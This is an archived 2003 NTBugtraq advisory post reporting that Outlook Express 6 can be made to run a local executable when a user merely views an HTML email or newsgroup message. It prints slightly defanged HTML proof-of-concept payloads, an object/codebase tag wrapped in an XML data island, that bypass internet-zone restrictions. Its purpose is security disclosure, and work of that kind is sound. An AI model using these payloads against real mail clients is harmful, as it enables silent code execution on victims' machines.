O UT LO OK E XPRE SS 6 .00 : broken

From: http-equiv@excite.com
Date: 02/22/03

  • Next message: Clive Flint: "Re: MSIEXEC problem with long user names"
    Date:         Sat, 22 Feb 2003 15:36:39 -0000
    From: "http-equiv@excite.com" <http-equiv@MALWARE.COM>
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Saturday, February 22, 2003

    Technical silent delivery and installation of an executable no client
    input other than reading an email or viewing a newsgroup message.
    Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever.

    This should not be possible.

    When viewing an email message or a newsgroup message, Outlook Express
    creates a temp file in the Internet Explorer cache. From here
    security should be governed by Internet Explorer's security settings.

    In an html email with internet zone applied, this will not function:

    <o bject classid="clsi d:1 1 1 1 1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1"
    code base="C:\WINDOWS\FTP.EXE"></object>

    [screen shot: http://www.malware.com/tsktsk.png 11KB]

    In an html email message or newsgroup message with internet zone
    applied this will function:

    <xml id=oExec> <security><exploit> <![CDATA[ <o bject id="oFile"
    classid="clsi d:1 1 1 1 1 1 1 1-1 1 1 1-1 1 1 1-1 1 1 1"
    code base="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>
    <SPAN dataFld=exploit dataFormatAs=html
    dataSrc=#oExec></SPAN>

    courtesy of: http://sec.greymagic.com/adv/gm001-ie/

    [screen shot: http://www.malware.com/tsktsktsk.png 11KB]

    NOTE: that default installations of Outlook Express 6.00 are with
    restricted zone applied. However there still remain many 'happy
    people' out there that enjoy their html mail messages and html
    newsgroup messages, and coupling the above with any one of a million
    other unsolved problems now and in the future with Internet Explorer
    and Outlook Express, including a new
    http://www.malware.com/stench.html we are back in business.

    Notes: This is supposed to be patched:
    http://microsoft.com/technet/security/bulletin/MS02-015.asp 28 March
    2002

    Keywords: experts Academic Advisory Board Think Tank security concepts

    --
    http://www.malware.com
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Delivery co-sponsored by TruSecure Corporation
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    TICSA - Anniversary Special - Limited Time
    Become TICSA certified for just $221.25 US when you register before 3/31/03
    with PROMO "TS0103" at www.2test.com.  NO membership fees, certification
    good for 2 years. Price for international delivery just $296.25 US, with
    this offer.  Offer cannot be combined with any other special and expires
    3/31/03. Visit www.trusecure.com/ticsa for full details.
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo